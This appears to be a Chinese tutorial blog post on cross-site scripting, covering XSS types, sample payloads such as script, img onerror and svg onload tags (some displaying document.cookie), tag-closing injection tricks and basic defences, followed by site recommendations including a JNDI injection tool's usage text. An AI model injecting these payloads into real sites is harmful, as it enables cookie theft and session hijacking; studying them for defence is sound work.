XSS(Cross-Site Scripting) - 攻防基本了解

已于 2023-12-13 17:40:12 修改
阅读量174 收藏 3
点赞数 2
分类专栏: 安全系列 文章标签: xss
于 2018-09-21 10:28:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Cai181191/article/details/82797673
版权

前言

XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的Web安全漏洞,攻击者通过在Web应用程序中注入恶意脚本,使得用户在访问受攻击页面时,恶意脚本会被执行,从而导致攻击者窃取用户敏感信息、劫持用户会话等安全问题。XSS攻击可以分为反射型、存储型和DOM型三种类型,其中反射型和存储型是最常见的类型。为了保证Web应用程序的安全性,开发者需要对输入输出进行有效的过滤和验证,避免注入恶意脚本。
 

一、什么是XSS

XSS (Cross-site scripting) ,中文名为跨站脚本攻击,为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击!

二、XSS有哪些类型

1. 反射型XSS

该类型的脚本代码是非持久化的,需要欺骗用户自己去点击恶意链接,然后触发代码执行。一般出现在搜索页面。反射型XSS大多数是用来盗取用户的Cookie信息。

2. 存储型XSS

该类型的脚本代码是持久化的,其存储在被攻击的服务器的数据库中。例如,当在填写个人信息、发表文章等具有表单输入的地方。尤其是插入代码,若输入内容后,前后端没有过滤或过滤不严,那么这些脚本代码就会保存到服务器的数据库中。然后用户访问该页面的时候,触发代码执行,执行非法操作和盗取用户信息。

3. DOM型XSS

DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞,DOM-XSS是通过url传入参数去控制触发的,整个过程都在前端完成。

三、XSS的攻击载荷

1. <script>标签

<script>标签是最直接的XSS有效载荷,脚本标记可以引用外部的JavaScript代码,也可以将代码插入脚本标记中。

<script>alert('hack')</script>   			 # 弹出hack
<script>alert(/hack/)</script>               # 弹出hack
<script>alert(1)</script>                    # 弹出1,对于数字可以不用引号
<script>alert(document.cookie)</script>      # 弹出cookie
<script src=/xss.js></script>                # 引用外部的xss

2. svg标签

<svg onload='alert(1)'>

3.<img>标签

<img src=1 οnerrοr=alert('hack')>
<img src=1 οnerrοr=alert(document.cookie)>   # 弹出cookie

4.<body>标签

<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>

5.style标签

<style οnlοad=alert(1)></style>

四、XSS注入的区域

1. 当输入为HTML注释内容,导致攻击者可以进行闭合绕过
<!-- 用户输入 -->
<!-- --><script>alert('hack')</script><!-- -->

2. 当输入为标签属性名,导致攻击者可以进行闭合绕过
<div 用户输入='xx'>  </div>
<div ></div><script>alert('hack')</script><div a='xx'> </div>

3. 当输入为标签属性值,导致攻击者可以进行闭合绕过
<div id='用户输入'></div>
<div id=''></div><script>alert('hack')</script><div a='x'></div>

4. 当输入为标签名,导致攻击者可以进行闭合绕过
<用户输入  id='xx' />
<><script>alert('hack')</script><b id='xx' />

5. 当输入为CSS内容,导致攻击者可以进行闭合绕过
<style>用户输入<style>
<style> </style><script>alert('hack')</script><style> </style>

五、XSS有哪些危害

1. 窃取Cookie
2. 执行非法操作
3. 记录用户键盘输入信息
4. DDos攻击(在一些访问量大网站上 XSS 可以攻击一些小型网站,实现 DDoS 攻击效果。)
5. 钓鱼(攻击者可以利用漏洞注入 DOM,伪造登录框,诱导用户在本不需要登录的页面,去输入自己的用户名和密码。)

六、XSS防护

1. 服务端设置会话Cookie的HTTP Only属性,这样,客户端的JS脚本就不能获取Cookie信息了。
2. 对用户的输入(和URL参数)进行过滤,对输出进行html编码。
3. 若项目有富文本编辑器,需要对内容进行过滤。

帅龍之龍
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
记一次因敏感信息泄露而导致的越权+存储型XSS
2301_80127209的博客
07-23 594
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
JNDIExploit使用
07-29
一款用于 JNDI注入利用的工具,大量参考/引用了 Rogue JNDI项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用 java -jar JNDIExploit.jar -h查看参数说明,其中 --ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false) -h, --help Show this help Dockerfile git clone https://github.com/feihong-cs/JNDIExploit.git cd ./JN
基于MATLAB的人体行为识别.zip
最新发布
07-29
在MATLAB中,可以使用机器学习和计算机视觉技术来实现人体行为识别。下面是一个基本的人体行为识别过程的程序: 1. 数据收集和准备: - 收集包含不同人体行为的视频数据。 - 使用视频处理技术提取每个视频中的人体姿势和关键点信息。 2. 特征提取: - 使用计算机视觉技术,如OpenPose或者其他姿势估计算法,提取每个视频中的人体关键点位置。 - 根据关键点位置计算特征向量,例如关节角度、运动速度等。 3. 数据标记和标签: - 根据人体行为类型,对收集的数据进行标记和分类,例如步行、跑步、打球等。 - 为每个人体行为类型分配一个标签。 4. 训练模型: - 使用机器学习算法,如支持向量机(SVM)、决策树、深度神经网络等,对标记和分类的数据进行训练。 - 使用训练数据和标签训练模型,以学习不同行为类型之间的关系。 5. 测试和识别: - 使用训练好的模型对新的测试数据进行预测和识别。 - 输入测试数据的特征向量到训练好的模型中,根据模型的输出来确定人体行为类型。 6. 评估和改进: - 根据测试结果评估
【创新未发表】Matlab实现蝗虫优化算法GOA-Kmean-Transformer-BiLSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【SCI一区】Matlab实现向量加权平均算法INFO-CNN-LSTM-Attention的风电功率预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
5份个人单页简历素材-清新单页.zip
07-29
【简历模板】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
【创新未发表】Matlab实现星雀优化算法NOA-Kmean-Transformer-BiLSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
和语音活动检测相关的数据集
07-29
语音活动检测数据集 数据说明: 语音活动检测任务可以区分出现人类语音和其他类型声音(如沉默和声)的信号段。 它是许多语音/音频应用的起点,包括语音编码,语音识别和语音增强。 由于这类任务没有特定的公共数据集,所以该数据集是从三个不同的数据库收集的719个音频。包括: ·TIMIT:是一个读语音语资料库,旨在为声学和语音研究提供语音数据,并评估自动语音识别系统。 · PTDB-TUG:是一个用于音高跟踪的语音数据库,提供20个讲英语者的麦克风信号。 ·Noizeus:包含30个句子的语音数据。噪音信号被人为添加到语音信号中,特别是该数据库包含被胡言乱语(人群)、街道、火车、火车站、汽车和餐馆噪音破坏的音频,SNR为5分贝,以及原始噪音。
刚体不稳定自由旋转的简单MATLAB仿真-SpinSpin-四元数- v2-MATLAB
07-29
旋转物体运动学是基于“标量第一单位四元数”的。 项目“SpinSpin_Quaternion_v1”与此项目类似。 项目“SpinSpin_RotationVector”与此项目类似,但基于“RotationVector”。 标量第一单位四元数定义: 标量第一单位四元数是长度为4的一维行或列向量。 使用Matlab的“ode45”函数求解常微分方程(ODE),应用Dorman-Prince 4(5)显式嵌入式自适应时间步长龙格-库塔方法。 Matlab“ode45”函数中的误差限制设置为10-13。
AI绘画介绍及应用场景.pdf
07-29
AI绘画的应用场景非常广泛。在艺术创作领域,AI可以为艺术家提供灵感和创作素材,帮助他们探索新的艺术风格和表现手法。同时,AI绘画也可以用于游戏、动画、电影等娱乐产业的视觉制作中,提高制作效率和降低成本。此外,AI绘画还可以用于教育、医疗等领域,为学生提供更加直观、生动的学习材料,为医生提供更加准确的诊断依据。
html+css+js作业王者荣耀司空震1个页面.zip
07-29
预览地址:https://blog.csdn.net/qq_42431718/article/details/140774765 王者荣耀司空震1个页面(带js)有轮播图
适用于一些手游的Auto.js自动脚本 (楚留香,原神,天涯明月刀,光遇,逆水寒手游)(自动弹琴,演奏,喊话,发消息)
07-29
autojs
基于python+django+mysql深度学习的音乐推荐方法研究系统(含论文、答辩PPT)
07-29
详见:https://blog.csdn.net/Timi2019/article/details/140774995 系统介绍: 该资源是一个基于Python和Django框架的深度学习音乐推荐系统的源码数据库,主要适用于毕业设计或相关项目开发。这个系统利用了现代机器学习技术,特别是深度学习,来为用户提供个性化的音乐推荐,提升用户体验。接下来,我们将深入探讨其中涉及的关键知识点。 运行环境: 数据库:MySQL 8.0.26 Python版本:3.7
【创新未发表】Matlab实现减法平均优化算法SABO-Kmean-Transformer-LSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
智慧农业系统介绍PPT(46页).pptx
07-29
智慧农业是一种结合了现代信息技术,包括物联网、大数据、云计算等,对农业生产过程进行智能化管理和监控的新模式。它通过各种传感器和设备采集农业生产中的关键数据,如大气、土壤和水质参数,以及生物生长状态等,实现远程诊断和精准调控。智慧农业的核心价值在于提高农业生产效率,保障食品安全,实现资源的可持续利用,并为农业产业的转型升级提供支持。 智慧农业的实现依赖于多个子系统,包括但不限于设施蔬菜精细化种植管理系统、农业技术资料库、数据采集系统、防伪防串货系统、食品安全与质量追溯系统、应急追溯系统、灾情疫情防控系统、农业工作管理系统、远程诊断系统、监控中心、环境监测系统、智能环境控制系统等。这些系统共同构成了一个综合的信息管理和服务平台,使得农业生产者能够基于数据做出更加科学的决策。 数据采集是智慧农业的基础。通过手工录入、传感器自动采集、移动端录入、条码/RFID扫描录入、拍照录入以及GPS和遥感技术等多种方式,智慧农业系统能够全面收集农业生产过程中的各种数据。这些数据不仅包括环境参数,还涵盖了生长状态、加工保存、检验检疫等环节,为农业生产提供了全面的数据支持。 智慧农业的应用前景广阔,它不仅能够提升农业生产的管理水平,还能够通过各种应用系统,如库房管理、无公害监控、物资管理、成本控制等,为农业生产者提供全面的服务。此外,智慧农业还能够支持政府监管,通过发病报告、投入品报告、死亡报告等,加强农业产品的安全管理和质量控制。 面对智慧农业的建设和发展,存在一些挑战,如投资成本高、生产过程标准化难度大、数据采集和监测的技术难题等。为了克服这些挑战,需要政府、企业和相关机构的共同努力,通过政策支持、技术创新和教育培训等手段,推动智慧农业的健康发展。智慧农业的建设需要明确建设目的,选择合适的系统模块,并制定合理的设备布署方案,以实现农业生产的智能化、精准化和高效化。
图的遍历及其C语言实现
07-29
图的遍历及其C语言实现
【创新未发表】Matlab实现凌日优化算法TSOA-Kmean-Transformer-BiLSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现豪猪优化算法CPO-Kmean-Transformer-LSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
5份个人单页简历素材-极简单页.zip
07-29
【简历模板】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
Breach-2_final2.1_xss挑战上线:实战演示与攻防策略
对于那些寻求写出详尽攻略的人来说,特别期待能看到那些未预见的路径,这些路径可能涉及到XSS(Cross-Site Scripting)漏洞的利用,因为题目中提及了"xss"标签,表明XSS攻击可能是游戏中的一个关键环节。XSS是一种...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值